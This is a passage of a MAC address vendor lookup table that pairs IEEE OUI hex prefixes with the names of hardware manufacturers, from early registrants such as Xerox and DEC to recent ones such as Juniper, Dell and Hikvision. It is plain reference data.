0050DF AirFiber, Inc. 0050AA KONICA MINOLTA HOLDINGS, INC. 005038 DAIN TELECOM CO., LTD. 0050A8 OpenCon Systems, Inc. 0050FE PCTVnet ASA 0050AB NALTEC, Inc. 005037 KOGA ELECTRONICS CO. 005006 TAC AB 005009 PHILIPS BROADBAND NETWORKS 005030 FUTURE PLUS SYSTEMS 0050C5 ADS Technologies, Inc 00508E OPTIMATION, INC. 005028 AVAL COMMUNICATIONS 00502F TollBridge Technologies, Inc. 0090AD ASPECT ELECTRONICS, INC. 0090E6 ALi Corporation 009070 NEO NETWORKS, INC. 009030 HONEYWELL-DATING 009008 HanA Systems Inc. 0050B7 BOSER TECHNOLOGY CO., LTD. 005078 MEGATON HOUSE, LTD. 005002 OMNISEC AG 00506A EDEVA, INC. 0050CB JETTER 005058 Sangoma Technologies 009001 NISHIMU ELECTRONICS INDUSTRIES CO., LTD. 009080 NOT LIMITED, INC. 0090E8 MOXA TECHNOLOGIES CORP., LTD. 0090A1 Flying Pig Systems/High End Systems Inc. 009079 ClearOne, Inc. 00909A ONE WORLD SYSTEMS, INC. 0090C2 JK microsystems, Inc. 0090AC OPTIVISION, INC. 009088 BAXALL SECURITY LTD. 00906C Sartorius Hamburg GmbH 0090A4 ALTIGA NETWORKS 0090F9 Imagine Communications 009089 SOFTCOM MICROSYSTEMS, INC. 0090EE PERSONAL COMMUNICATIONS TECHNOLOGIES 001023 Network Equipment Technologies 00102B UMAX DATA SYSTEMS, INC. 00108D Johnson Controls, Inc. 001045 Nortel Networks 00107D AURORA COMMUNICATIONS, LTD. 001039 Vectron Systems AG 00904E DELEM BV 0090ED CENTRAL SYSTEM RESEARCH CO., LTD. 0090C8 WAVERIDER COMMUNICATIONS (CANADA) INC. 00901B DIGITAL CONTROLS 009047 GIGA FAST E. LTD. 0090E1 TELENA S.P.A. 0090CB Wireless OnLine, Inc. 001063 STARGUIDE DIGITAL NETWORKS 0090F7 NBASE COMMUNICATIONS LTD. 009012 GLOBESPAN SEMICONDUCTOR, INC. 00908A BAYLY COMMUNICATIONS, INC. 00900E HANDLINK TECHNOLOGIES, INC. 0090E4 NEC AMERICA, INC. 0090C1 Peco II, Inc. 009040 Siemens Network Convergence LLC 0090B7 DIGITAL LIGHTWAVE, INC. 0090A0 8X8 INC. 009032 PELCOMBE GROUP LTD. 00901E Selesta Ingegneria S.p.A. 009075 NEC DO BRASIL S.A. 001075 Segate Technology LLC 0010B1 FOR-A CO., LTD. 0010EE CTI PRODUCTS, INC. 001041 BRISTOL BABCOCK, INC. 0010AA MEDIA4, INC. 0010E8 TELOCITY, INCORPORATED 0010A2 TNS 001000 CABLE TELEVISION LABORATORIES, INC. 001009 HORANET 001066 ADVANCED CONTROL SYSTEMS, INC. 00104C Teledyne LeCroy, Inc 0010CC CLP COMPUTER LOGISTIK PLANUNG GmbH 001030 EION Inc. 001062 NX SERVER, ILNC. 0010F0 RITTAL-WERK RUDOLF LOH GmbH & Co. 001001 Citel 00105C QUANTUM DESIGNS (H.K.) LTD. 0010B6 ENTRATA COMMUNICATIONS CORP. 0010EC Embedded Planet 001059 DIABLO RESEARCH CO. LLC 001069 HELIOSS COMMUNICATIONS, INC. 0010BF InterAir Wireless 001036 INTER-TEL INTEGRATED SYSTEMS 001026 ACCELERATED NETWORKS, INC. 0010AC IMCI TECHNOLOGIES 001065 RADYNE CORPORATION 00101D WINBOND ELECTRONICS CORP. 00109F PAVO, INC. 001084 K-BOT COMMUNICATIONS 0010F9 UNIQUE SYSTEMS, INC. 001002 ACTIA 00105B NET INSIGHT AB 0010EB SELSIUS SYSTEMS, INC. 001057 Rebel.com, Inc. 0010CF FIBERLANE COMMUNICATIONS 0010A4 XIRCOM 0010F1 I-O CORPORATION 0010C0 ARMA, Inc. 00106D Axxcelera Broadband Wireless 0010D0 WITCOM, LTD. 001093 CMS COMPUTERS, LTD. 00108F RAPTOR SYSTEMS 0010F8 TEXIO TECHNOLOGY CORPORATION 0010FC BROADBAND NETWORKS, INC. 001031 OBJECTIVE COMMUNICATIONS, INC. 00E09F PIXEL VISION 00E0CC HERO SYSTEMS, LTD. 00E080 CONTROL RESOURCES CORPORATION 00E004 PMC-SIERRA, INC. 00E03B PROMINET CORPORATION 00E0F5 TELES AG 00E0D7 SUNSHINE ELECTRONICS, INC. 00E0B5 ARDENT COMMUNICATIONS CORP. 00E008 AMAZING CONTROLS! INC. 00E0AE XAQTI CORPORATION 00E0E0 SI ELECTRONICS, LTD. 00E0C8 VIRTUAL ACCESS, LTD. 00E006 SILICON INTEGRATED SYS. CORP. 00E0AC MIDSCO, INC. 08BBCC AK-NORD EDV VERTRIEBSGES. mbH 00E003 NOKIA WIRELESS BUSINESS COMMUN 00E0F3 WebSprint Communications, Inc. 00E023 TELRAD 00E02A TANDBERG TELEVISION AS 00E04E SANYO DENKI CO., LTD. 00E012 PLUTO TECHNOLOGIES INTERNATIONAL INC. 00E04C REALTEK SEMICONDUCTOR CORP. 00E095 ADVANCED-VISION TECHNOLGIES CORP. 00E00E AVALON IMAGING SYSTEMS, INC. 00E048 SDL COMMUNICATIONS, INC. 00E0CB RESON, INC. 00E0EF DIONEX 00E051 TALX CORPORATION 00E02D InnoMediaLogic, Inc. 00E035 Artesyn Embedded Technologies 00E0FA TRL TECHNOLOGY, LTD. 00E02C AST COMPUTER 00E067 eac AUTOMATION-CONSULTING GmbH 00E068 MERRIMAC SYSTEMS INC. 00E049 MICROWI ELECTRONIC GmbH 00E050 EXECUTONE INFORMATION SYSTEMS, INC. 00E0DB ViaVideo Communications, Inc. 00E0A6 TELOGY NETWORKS, INC. 00E0F4 INSIDE Technology A/S 00E0A0 WILTRON CO. 00E0C7 EUROTECH SRL 00E0F1 THAT CORPORATION 00E0AF GENERAL DYNAMICS INFORMATION SYSTEMS 00E054 KODAI HITEC CO., LTD. 00E0B9 BYAS SYSTEMS 00604B Safe-com GmbH & Co. KG 00606B Synclayer Inc. 00603B AMTEC spa 00E039 PARADYNE CORP. 00600B LOGWARE GmbH 0060D5 AMADA MIYACHI Co., Ltd 00603F PATAPSCO DESIGNS 0060E6 SHOMITI SYSTEMS INCORPORATED 0060FF QuVis, Inc. 006067 ACER NETXUS INC. 00609F PHAST CORPORATION 006042 TKS (USA), INC. 006079 Mainstream Data, Inc. 00609A NJK TECHNO CO. 00602B PEAK AUDIO 0060F1 EXP COMPUTER, INC. 000800 MULTITECH SYSTEMS, INC. 00607E GIGALABS, INC. 00E090 BECKMAN LAB. AUTOMATION DIV. 00E085 GLOBAL MAINTECH, INC. 00E0BE GENROCO INTERNATIONAL, INC. 00E0B6 Entrada Networks 0005A8 WYLE ELECTRONICS 006040 NETRO CORP. 0060CC EMTRAK, INCORPORATED 00602C LINX Data Terminals, Inc. 0060B5 KEBA GmbH 006001 InnoSys, Inc. 0060FE LYNX SYSTEM DEVELOPERS, INC. 0060BD Enginuity Communications 006025 ACTIVE IMAGING PLC 0060A7 MICROSENS GmbH & CO. KG 0060AC RESILIENCE CORPORATION 00604E CYCLE COMPUTER CORPORATION, INC. 006014 EDEC CO., LTD. 0060E1 ORCKIT COMMUNICATIONS LTD. 0060D2 LUCENT TECHNOLOGIES TAIWAN TELECOMMUNICATIONS CO., LTD. 0060CD VideoServer, Inc. 00A048 QUESTECH, LTD. 00A0FC IMAGE SCIENCES, INC. 00A09C Xyplex, Inc. 00A00D THE PANDA PROJECT 00A0E9 ELECTRONIC RETAILING SYSTEMS INTERNATIONAL 00A0BE INTEGRATED CIRCUIT SYSTEMS, INC. COMMUNICATIONS GROUP 0060AA INTELLIGENT DEVICES INC. (IDI) 006065 B&R Industrial Automation GmbH 00605D SCANIVALVE CORP. 00606F CLARION CORPORATION OF AMERICA 006090 Artiza Networks Inc 00A010 SYSLOGIC DATENTECHNIK AG 00A016 MICROPOLIS CORP. 00A039 ROSS TECHNOLOGY, INC. 00A0AD MARCONI SPA 00A0D6 SBE, Inc. 00A02E BRAND COMMUNICATIONS, LTD. 00600D Digital Logic GmbH 00604A SAIC IDEAS GROUP 00A0BD I-TECH CORP. 00A059 HAMILTON HALLMARK 0060E5 FUJI AUTOMATION CO., LTD. 00605E LIBERTY TECHNOLOGY NETWORKING 0060C6 DCS AG 00601E SOFTLAB, INC. 006030 VILLAGE TRONIC ENTWICKLUNG 00A08D JACOMO CORPORATION 00A08E Check Point Software Technologies 00A0F5 RADGUARD LTD. 00A0CA FUJITSU DENSO LTD. 00A022 CENTRE FOR DEVELOPMENT OF ADVANCED COMPUTING 00A0B5 3H TECHNOLOGY 00A04D EDA INSTRUMENTS, INC. 00A086 AMBER WAVE SYSTEMS, INC. 00A0AF WMS INDUSTRIES 00A057 LANCOM Systems GmbH 00A09F COMMVISION CORP. 00A0F8 Zebra Technologies Inc 00A0B6 SANRITZ AUTOMATION CO., LTD. 00A079 ALPS ELECTRIC (USA), INC. 00A084 Dataplex Pty Ltd 00A049 DIGITECH INDUSTRIES, INC. 00A09D JOHNATHON FREEMAN TECHNOLOGIES 00A06E AUSTRON, INC. 00A0BA PATTON ELECTRONICS CO. 00A0C0 DIGITAL LINK CORP. 00A01E EST CORPORATION 00A062 AES PRODATA 00A0AE NUCOM SYSTEMS, INC. 00A076 CARDWARE LAB, INC. 00A06B DMS DORSCH MIKROSYSTEM GMBH 00A030 CAPTOR NV/SA 00A0F9 BINTEC COMMUNICATIONS GMBH 00A003 Siemens Switzerland Ltd., I B T HVP 00A0A1 EPIC DATA INC. 00A044 NTT IT CO., LTD. 00A011 MUTOH INDUSTRIES LTD. 000267 NODE RUNNER, INC. 0020B1 COMTECH RESEARCH INC. 002032 ALCATEL TAISEL 0020E9 DANTEL 002022 NMS Communications 0020AE ORNET DATA COMMUNICATION TECH. 0020AA Ericsson Television Limited 002074 SUNGWOON SYSTEMS 00203C EUROTIME AB 002028 WEST EGG SYSTEMS, INC. 002068 ISDYNE 0020C8 LARSCOM INCORPORATED 00209D LIPPERT AUTOMATIONSTECHNIK 00209C PRIMARY ACCESS CORP. 00206D DATA RACE, INC. 00203A DIGITAL BI0METRICS INC. 00200E NSSLGlobal Technologies AS 00A0DE YAMAHA CORPORATION 0020FD ITV TECHNOLOGIES, INC. 0020A4 MULTIPOINT NETWORKS 002051 Verilink Corporation 00203B WISDM LTD. 0020BA CENTER FOR HIGH PERFORMANCE 0020F5 PANDATEL AG 002005 SIMPLE TECHNOLOGY 0020FA GDE SYSTEMS, INC. 002038 VME MICROSYSTEMS INTERNATIONAL CORPORATION 0020A3 Harmonic, Inc 002059 MIRO COMPUTER PRODUCTS AG 002080 SYNERGY (UK) LTD. 002018 CIS TECHNOLOGY INC. 002098 HECTRONIC AB 002034 ROTEC INDUSTRIEAUTOMATION GMBH 002079 MIKRON GMBH 002011 CANOPUS CO., LTD. 00C023 TUTANKHAMON ELECTRONICS 00C08B RISQ MODULAR SYSTEMS, INC. 0020C4 INET,INC. 00C0C3 ACUSON COMPUTED SONOGRAPHY 00C080 NETSTAR, INC. 00C0B4 MYSON TECHNOLOGY, INC. 00C045 ISOLATION SYSTEMS, LTD. 00C0F1 SHINKO ELECTRIC CO., LTD. 00C0A1 TOKYO DENSHI SEKEI CO. 00C02E NETWIZ 00C047 UNIMICRO SYSTEMS, INC. 00C084 DATA LINK CORP. LTD. 00C041 DIGITAL TRANSMISSION SYSTEMS 0070B3 DATA RECALL LTD. 0070B0 M/A-COM INC. COMPANIES 00E6D3 NIXDORF COMPUTER CORP. 00C01F S.E.R.C.E.L. 006086 LOGIC REPLACEMENT TECH. LTD. 00C059 DENSO CORPORATION 00C00D ADVANCED LOGIC RESEARCH, INC. 00C081 METRODATA LTD. 00C03B MULTIACCESS COMPUTING CORP. 00C082 MOORE PRODUCTS CO. 00C099 YOSHIKI INDUSTRIAL CO.,LTD. 00C0B6 HVE, Inc. 00C07A PRIVA B.V. 00C06D BOCA RESEARCH, INC. 00C0EA ARRAY TECHNOLOGY LTD. 00C009 KT TECHNOLOGY (S) PTE LTD 002061 GarrettCom, Inc. 0020DC DENSITRON TAIWAN LTD. 002048 Marconi Communications 00200C ADASTRA SYSTEMS CORP. 0020E7 B&W NUCLEAR SERVICE COMPANY 0020F0 UNIVERSAL MICROELECTRONICS CO. 002089 T3PLUS NETWORKING, INC. 00C0B3 COMSTAT DATACOMM CORPORATION 00C0E5 GESPAC, S.A. 00C04D MITEC, INC. 00C08C PERFORMANCE TECHNOLOGIES, INC. 00C007 PINNACLE DATA SYSTEMS, INC. 00C0F8 ABOUT COMPUTING INC. 00C078 COMPUTER SYSTEMS ENGINEERING 00C0C2 INFINITE NETWORKS LTD. 00C0AF TEKLOGIX INC. 00C001 DIATEK PATIENT MANAGMENT 00C0F4 INTERLINK SYSTEM CO., LTD. 00C0E2 CALCOMP, INC. 00C07B ASCEND COMMUNICATIONS, INC. 00C098 CHUNTEX ELECTRONIC CO., LTD. 00C0BE ALCATEL - SEL 00C06E HAFT TECHNOLOGY, INC. 00C08A Lauterbach GmbH 0040B7 STEALTH COMPUTER SYSTEMS 00C09A PHOTONICS CORPORATION 00C01A COROMETRICS MEDICAL SYSTEMS 00C068 HME Clear-Com LTD. 00C0D8 UNIVERSAL DATA SYSTEMS 00C072 KNX LTD. 00C0AE TOWERCOM CO. INC. DBA PC HOUSE 00C0D6 J1 SYSTEMS, INC. 00C0DC EOS TECHNOLOGIES, INC. 00C03C TOWER TECH S.R.L. 00C01D GRAND JUNCTION NETWORKS, INC. 00C070 SECTRA SECURE-TRANSMISSION AB 0040AC SUPER WORKSTATION, INC. 00C0F7 ENGAGE COMMUNICATION, INC. 10005A IBM Corp 00C0F6 CELAN TECHNOLOGY INC. 0040F1 CHUO ELECTRONICS CO., LTD. 0040A9 DATACOM INC. 0040E3 QUIN SYSTEMS LTD 004091 PROCOMP INDUSTRIA ELETRONICA 0040EA PLAIN TREE SYSTEMS INC 004014 COMSOFT GMBH 004000 PCI COMPONENTES DA AMZONIA LTD 0040D1 FUKUDA DENSHI CO., LTD. 004069 LEMCOM SYSTEMS, INC. 00403B SYNERJET INTERNATIONAL CORP. 00803B APT COMMUNICATIONS, INC. 00806A ERI (EMPAC RESEARCH INC.) 00C0A8 GVC CORPORATION 00408A TPS TELEPROCESSING SYS. GMBH 0040FD LXE 004099 NEWGEN SYSTEMS CORP. 004011 ANDOVER CONTROLS CORPORATION 0040A1 ERGO COMPUTING 004081 MANNESMANN SCANGRAPHIC GMBH 004036 Minim Inc. 004016 ADC - Global Connectivity Solutions Division 00406A KENTEK INFORMATION SYSTEMS,INC 00400A PIVOTAL TECHNOLOGIES, INC. 004082 LABORATORY EQUIPMENT CORP. 0040FA MICROBOARDS, INC. 0040E0 ATOMWIDE LTD. 00403F SSANGYONG COMPUTER SYSTEMS 0040A8 IMF INTERNATIONAL LTD. 004070 INTERWARE CO., LTD. 004075 Tattile SRL 004053 AMPRO COMPUTERS 008038 DATA RESEARCH & APPLICATIONS 00805E LSI LOGIC CORPORATION 008060 NETWORK INTERFACE CORPORATION 0080C3 BICC INFORMATION SYSTEMS & SVC 008044 SYSTECH COMPUTER CORP. 00405E NORTH HILLS ISRAEL 0040A7 ITAUTEC PHILCO S.A. 004064 KLA INSTRUMENTS CORPORATION 00405A GOLDSTAR INFORMATION & COMM. 004013 NTT DATA COMM. SYSTEMS CORP. 00809B JUSTSYSTEM CORPORATION 0080DF ADC CODENOLL TECHNOLOGY CORP. 008028 TRADPOST (HK) LTD 008061 LITTON SYSTEMS, INC. 00400C GENERAL MICRO SYSTEMS, INC. 004063 VIA TECHNOLOGIES, INC. 00406C COPERNIQUE 004043 Nokia Siemens Networks GmbH & Co. KG. 0080F5 Quantel Ltd 0080B9 ARCHE TECHNOLIGIES INC. 0080A7 Honeywell International Inc 008006 COMPUADD CORPORATION 00808A SUMMIT MICROSYSTEMS CORP. 008066 ARCOM CONTROL SYSTEMS, LTD. 008049 NISSIN ELECTRIC CO., LTD. 0080C1 LANEX CORPORATION 0080A3 Lantronix 0080BC HITACHI ENGINEERING CO., LTD 00807C FIBERCOM, INC. 008091 TOKYO ELECTRIC CO.,LTD 00809D Commscraft Ltd. 0080D4 CHASE RESEARCH LTD. 00803D SURIGIKEN CO., LTD. 00808B DACOLL LIMITED 0080CB FALCO DATA PRODUCTS 008007 DLOG NC-SYSTEME 008062 INTERFACE CO. 0080A8 VITACOM CORPORATION 008033 EMS Aviation, Inc. 0080DD GMX INC/GIMIX 0080FB BVM LIMITED 00802D XYLOGICS INC 0080E2 T.D.I. CO., LTD. 008036 REFLEX MANUFACTURING SYSTEMS 008083 AMDAHL 00804D CYCLONE MICROSYSTEMS, INC. 0080B2 NETWORK EQUIPMENT TECHNOLOGIES 008076 MCNC 00801E XINETRON, INC. 008068 YAMATECH SCIENTIFIC LTD. 0080F4 TELEMECANIQUE ELECTRIQUE 008022 SCAN-OPTICS 0000CD Allied Telesis Labs Ltd 0080B4 SOPHIA SYSTEMS 00807F DY-4 INCORPORATED 00800B CSK CORPORATION 008018 KOBE STEEL, LTD. 0000F6 APPLIED MICROSYSTEMS CORP. 0000B2 TELEVIDEO SYSTEMS, INC. 0000EE NETWORK DESIGNERS, LTD. 0000E5 SIGMEX LTD. 000089 CAYMAN SYSTEMS INC. 0000FF CAMTEC ELECTRONICS LTD. 0000B7 DOVE COMPUTER CORPORATION 0000A2 Bay Networks 0000EC MICROPROCESS 000061 GATEWAY COMMUNICATIONS 0000EA UPNOD AB 000043 MICRO TECHNOLOGY 000017 Oracle 0000DC HAYES MICROCOMPUTER PRODUCTS 000063 BARCO CONTROL ROOMS GMBH 00004E AMPEX CORPORATION 0000C2 INFORMATION PRESENTATION TECH. 0000FC MEIKO 000065 Network General Corporation 000011 NORMEREL SYSTEMES 0000F2 SPIDER COMMUNICATIONS 0000CC DENSAN CO., LTD. 0000C4 WATERS DIV. OF MILLIPORE 0000EB MATSUSHITA COMM. IND. CO. LTD. 0000BD RYOSEI, Ltd. 00002E SOCIETE EVIRA 00003F SYNTREX, INC. 00008E SOLBOURNE COMPUTER, INC. 0000A4 ACORN COMPUTERS LIMITED 0000DD TCL INCORPORATED 0000AE DASSAULT ELECTRONIQUE 000077 INTERPHASE CORPORATION 00006D CRAY COMMUNICATIONS, LTD. 0000DA ATEX 0000DB British Telecommunications plc 0000C1 Madge Ltd. 08003B TORUS SYSTEMS LIMITED 08003C SCHLUMBERGER WELL SERVICES 080034 FILENET CORPORATION 080036 INTERGRAPH CORPORATION 080033 BAUSCH & LOMB 080030 NETWORK RESEARCH CORPORATION 080031 LITTLE MACHINES INC. 08002E METAPHOR COMPUTER SYSTEMS 080048 EUROTHERM GAUGING SYSTEMS 080043 PIXEL COMPUTER INC. 080045 CONCURRENT COMPUTER CORP. 000028 PRODIGY SYSTEMS CORPORATION 000010 SYTEK INC. 0000A0 SANYO Electric Co., Ltd. 0000C0 WESTERN DIGITAL CORPORATION 08002B DIGITAL EQUIPMENT CORPORATION 080029 Megatek Corporation 080023 Panasonic Communications Co., Ltd. 080075 DANSK DATA ELECTRONIK 080078 ACCELL CORPORATION 08006D WHITECHAPEL COMPUTER WORKS 08005E COUNTERPOINT COMPUTER INC. 08007E AMALGAMATED WIRELESS(AUS) LTD 08007F CARNEGIE-MELLON UNIVERSITY 080056 STANFORD LINEAR ACCEL. CENTER 08004F CYGNET SYSTEMS 080050 DAISY SYSTEMS CORP. 000099 MTX, INC. 000033 EGAN MACHINERY COMPANY 00009D LOCUS COMPUTING CORPORATION 0000FD HIGH LEVEL HARDWARE 0270B0 M/A-COM INC. COMPANIES 000053 COMPUCORP 08000A NESTAR SYSTEMS INCORPORATED 080090 SONOMA SYSTEMS 00800F STANDARD MICROSYSTEMS 00406B SYSGEN 08000F MITEL CORPORATION 00DD0E UNGERMANN-BASS INC. 000004 XEROX CORPORATION 080018 PIRELLI FOCOM NETWORKS 0000A6 NETWORK GENERAL CORPORATION 00BBF0 UNGERMANN-BASS INC. 00408E Tattile SRL 08001C KDD-KOKUSAI DEBNSIN DENWA CO. 00DD0C UNGERMANN-BASS INC. 0001C8 THOMAS CONRAD CORP. D077CE Edgecore Networks Corporation ECAFF9 Hailo Technologies Ltd. 68DDB7 TP-LINK TECHNOLOGIES CO.,LTD. 14D864 TP-LINK TECHNOLOGIES CO.,LTD. 905607 Sichuan AI-Link Technology Co., Ltd. B8AB61 Cisco Meraki B851A9 Nokia 483133 Robert Bosch Elektronika Kft. 90ECE3 Nokia 888F10 Shenzhen Max Infinite Technology Co.,Ltd. 887B2C zte corporation 60DBEF Unify Software and Solutions GmbH & Co. KG 44D5C1 EM Microelectronic 943BB1 Kaon Group Co., Ltd. 44F034 Kaon Group Co., Ltd. 3C08CD Juniper Networks 7C6A8A SINOBONDER Technology Co., Ltd. 5016F4 Motorola Mobility LLC, a Lenovo Company 68505D Halo Technologies 88B5FF Shenzhen iComm Semiconductor CO.,LTD C4799F Haiguang Smart Device Co.,Ltd. ACC048 OnePlus Technology (Shenzhen) Co., Ltd 408432 Microchip Technology Inc. 842859 Amazon Technologies Inc. 745D22 LCFC(HeFei) Electronics Technology co., ltd 709883 SHENZHEN KAYAN ELECTRONICS., LTD. E88088 LCFC(HeFei) Electronics Technology co., ltd C87023 Altice Labs S.A. F43A7B zte corporation 689E29 zte corporation 6C03B5 Cisco Systems, Inc A88B28 SHENZHEN DIYANG SMART TECHNOLOGY CO.,LTD. 8C1AF3 Shenzhen Gooxi Information Security CO.,Ltd. E44097 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD DCB4CA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B86CE0 Hewlett Packard Enterprise F4B6C6 Indra Heera Technology LLP A002A5 Intel Corporate 18A5FF Arcadyan Corporation 8CD54A TAIYO YUDEN CO.,LTD A89162 Sophos Ltd 08F01E eero inc. 50D33B cloudnineinfo 84C8A0 Hui Zhou Gaoshengda Technology Co.,LTD 58C41E IEEE Registration Authority C0E911 RealNetworks 8C3B4A Universal Global Scientific Industrial Co., Ltd. D87766 Nurivoice Co., Ltd B8A75E Wuxi Xinjie Electric Co.,Ltd 708185 New H3C Technologies Co., Ltd 8C53E6 Wistron Neweb Corporation 0C75D2 Hangzhou Hikvision Digital Technology Co.,Ltd. 345E08 Roku, Inc F8D2AC Vantiva USA LLC CCF3C8 Vantiva USA LLC 8417EF Vantiva USA LLC A456CC Vantiva USA LLC 70037E Vantiva USA LLC 441C12 Vantiva USA LLC D8DAF1 HUAWEI TECHNOLOGIES CO.,LTD 54443B HUAWEI TECHNOLOGIES CO.,LTD 5C7075 HUAWEI TECHNOLOGIES CO.,LTD CC03FA Vantiva USA LLC 48F7C0 Vantiva USA LLC 480033 Vantiva USA LLC 14987D Vantiva USA LLC 58238C Vantiva USA LLC 80B234 Vantiva USA LLC 5C7695 Vantiva USA LLC 383FB3 Vantiva USA LLC 641236 Vantiva USA LLC D0B2C4 Vantiva USA LLC 80C6AB Vantiva USA LLC AC4CA5 Vantiva USA LLC 00CB7A Vantiva USA LLC 203AEB zte corporation 5876B3 Ubee Interactive Co., Limited E87072 Hangzhou BroadLink Technology Co.,Ltd 60FDA6 Apple, Inc. 80A997 Apple, Inc. 348C5E Apple, Inc. 40F3B0 Texas Instruments 149CEF Texas Instruments 80C41B Texas Instruments 3468B5 Texas Instruments 307A57 Accuenergy (CANADA) Inc F0EE7A Apple, Inc. 58AD12 Apple, Inc. 481BA4 Cisco Systems, Inc 0C01C8 DENSO Co.,Ltd 040986 Arcadyan Corporation CCEB5E Xiaomi Communications Co Ltd ACD75B Sagemcom Broadband SAS 38398F Silicon Laboratories 1865C7 Dongguan YIMO Technology Co.LTD 7478A6 Fortinet, Inc. 001982 SmarDTV Corporation B4C2E0 Bouffalo Lab (Nanjing) Co., Ltd. F42E48 zte corporation 60C78D Juniper Networks DC5193 zte corporation BCFD0C Shenzhen Phaten Tech. LTD 34ECB6 Phyplus Microelectronics Limited 807677 hangzhou puwell cloud tech co., ltd. E44519 Beijing Xiaomi Electronics Co.,Ltd 2002FE Hangzhou Dangbei Network Technology Co., Ltd 74272C Advanced Micro Devices, Inc. 4C12E8 VIETNAM POST AND TELECOMMUNICATION INDUSTRY TECHNOLOGY JOIN STOCK COMPANY F42B8C Samsung Electronics Co.,Ltd E4B224 HUAWEI TECHNOLOGIES CO.,LTD A83ED3 HUAWEI TECHNOLOGIES CO.,LTD 6467CD HUAWEI TECHNOLOGIES CO.,LTD 9C1ECF Valeo Telematik und Akustik GmbH 000D39 Nevion 208810 Dell Inc. A06260 Private E43819 Shenzhen Hi-Link Electronic CO.,Ltd. 84F175 Jiangxi Xunte Intelligent Terminal Co., Ltd F4CAE7 Arcadyan Corporation 3CEF42 TCT mobile ltd B0A3F2 Huaqin Technology Co. LTD F86691 Sichuan Tianyi Comheart Telecom Co.,LTD 6C2ADF IEEE Registration Authority C05B44 Beijing Xiaomi Mobile Software Co., Ltd E82404 Quectel Wireless Solutions Co.,Ltd. 4CD2FB UNIONMAN TECHNOLOGY CO.,LTD E41A1D NOVEA ENERGIES 883037 Juniper Networks 60DC81 AltoBeam Inc. 20E46F vivo Mobile Communication Co., Ltd. C89828 zte corporation DC3642 zte corporation 788A86 China Dragon Technology Limited 608246 Apple, Inc. 98B379 Apple, Inc. 049D05 Apple, Inc. 34AA31 Shenzhen Skyworth Digital Technology CO., Ltd A04C0C Shenzhen Skyworth Digital Technology CO., Ltd 6CC242 Shenzhen Skyworth Digital Technology CO., Ltd C8138B Shenzhen Skyworth Digital Technology CO., Ltd 847293 Texas Instruments F82E0C Texas Instruments 9006F2 Texas Instruments B87BD4 Google, Inc. E86E3A Sony Interactive Entertainment Inc. BCB1D3 Cisco Meraki 54083B IEEE Registration Authority 54EF43 HUAWEI TECHNOLOGIES CO.,LTD D81BB5 HUAWEI TECHNOLOGIES CO.,LTD 8464DD HUAWEI TECHNOLOGIES CO.,LTD 68A46A HUAWEI TECHNOLOGIES CO.,LTD E073E7 HP Inc. 001422 Dell Inc. 0015C5 Dell Inc. C81F66 Dell Inc. F8DB88 Dell Inc. 64006A Dell Inc. 109836 Dell Inc. 90B11C Dell Inc. 544E45 Private 209727 TELTONIKA NETWORKS UAB 001AE8 Unify Software and Solutions GmbH & Co. KG 8C04BA Dell Inc. E454E8 Dell Inc. A4BB6D Dell Inc. 2CEA7F Dell Inc. F0D4E2 Dell Inc. A8B028 CubePilot Pty Ltd 407F5F Juniper Networks 0026B9 Dell Inc. F48E38 Dell Inc. D067E5 Dell Inc. E4434B Dell Inc. 6C3C8C Dell Inc. C45AB1 Dell Inc. CC483A Dell Inc. 30D042 Dell Inc. 28F10E Dell Inc. 7845C4 Dell Inc. 5C260A Dell Inc. 001E4F Dell Inc. A46DD4 Silicon Laboratories 2C704F zte corporation 381672 Shenzhen SuperElectron Technology Co.,Ltd. 6C29D2 Cisco Systems, Inc 08CC81 Hangzhou Hikvision Digital Technology Co.,Ltd. D43844 UNION MAN TECHNOLOGY CO.,LTD 907E43 zte corporation 943EE4 WiSA Technologies Inc 645234 Sichuan Tianyi Comheart Telecom Co.,LTD D07B6F Zhuhai Yunmai Technology Co.,Ltd 2CFE4F Xiaomi Communications Co Ltd F45433 Rockwell Automation 34C0F9 Rockwell Automation 5C8816 Rockwell Automation A8BD3A UNION MAN TECHNOLOGY CO.,LTD 48CAC6 UNION MAN TECHNOLOGY CO.,LTD D45347 Merytronic 2012, S.L. 489E9D Hui Zhou Gaoshengda Technology Co.,LTD 04A526 Nokia 28EA0B Microsoft Corporation 20BA36 u-blox AG 0815AE China Mobile Group Device Co.,Ltd. 04B4FE AVM Audiovisuelles Marketing und Computersysteme GmbH E01F6A Huawei Device Co., Ltd. 00566D Huawei Device Co., Ltd. 90CC7A Huawei Device Co., Ltd. 8CC58C ShenZhen Elsky Technology Co.,LTD 9C65EE DZS Inc. D80AE6 zte corporation 9C5416 Cisco Systems, Inc A41437 Hangzhou Hikvision Digital Technology Co.,Ltd. F84DFC Hangzhou Hikvision Digital Technology Co.,Ltd. 849A40 Hangzhou Hikvision Digital Technology Co.,Ltd. C0517E Hangzhou Hikvision Digital Technology Co.,Ltd. 2CA59C Hangzhou Hikvision Digital Technology Co.,Ltd. 40ACBF Hangzhou Hikvision Digital Technology Co.,Ltd. 98F112 Hangzhou Hikvision Digital Technology Co.,Ltd. 989DE5 Hangzhou Hikvision Digital Technology Co.,Ltd. 3C1BF8 Hangzhou Hikvision Digital Technology Co.,Ltd. C0DD8A Meta Platforms Technologies, LLC CCA174 Meta Platforms Technologies, LLC 18F46B Telenor Connexion AB 48BDA7 Honor Device Co., Ltd. EC2150 vivo Mobile Communication Co., Ltd. 0017CB Juniper Networks 001F12 Juniper Networks 0024DC Juniper Networks A0AF12 HUAWEI TECHNOLOGIES CO.,LTD 6096A4 HUAWEI TECHNOLOGIES CO.,LTD 4C16FC Juniper Networks C8E7F0 Juniper Networks 7C2586 Juniper Networks EC3873 Juniper Networks C00380 Juniper Networks 784558 Ubiquiti Inc AC8BA9 Ubiquiti Inc 9C05D6 Ubiquiti Inc 28704E Ubiquiti Inc 002283 Juniper Networks 30B64F Juniper Networks 08B258 Juniper Networks F4A739 Juniper Networks 5C5EAB Juniper Networks 7819F7 Juniper Networks 2C2172 Juniper Networks 4C9614 Juniper Networks 100E7E Juniper Networks 44F477 Juniper Networks 00121E Juniper Networks 0010DB Juniper Networks 4CE705 Siemens Industrial Automation Products Ltd., Chengdu 0C7274 AVM Audiovisuelles Marketing und Computersysteme GmbH CC9F7A Chiun Mai Communication System, Inc 5414A7 Nanjing Qinheng Microelectronics Co., Ltd. 005828 Axon Networks Inc. 380716 FREEBOX SAS 5C6AEC IEEE Registration Authority 880AA3 Juniper Networks 80DB17 Juniper Networks B8F015 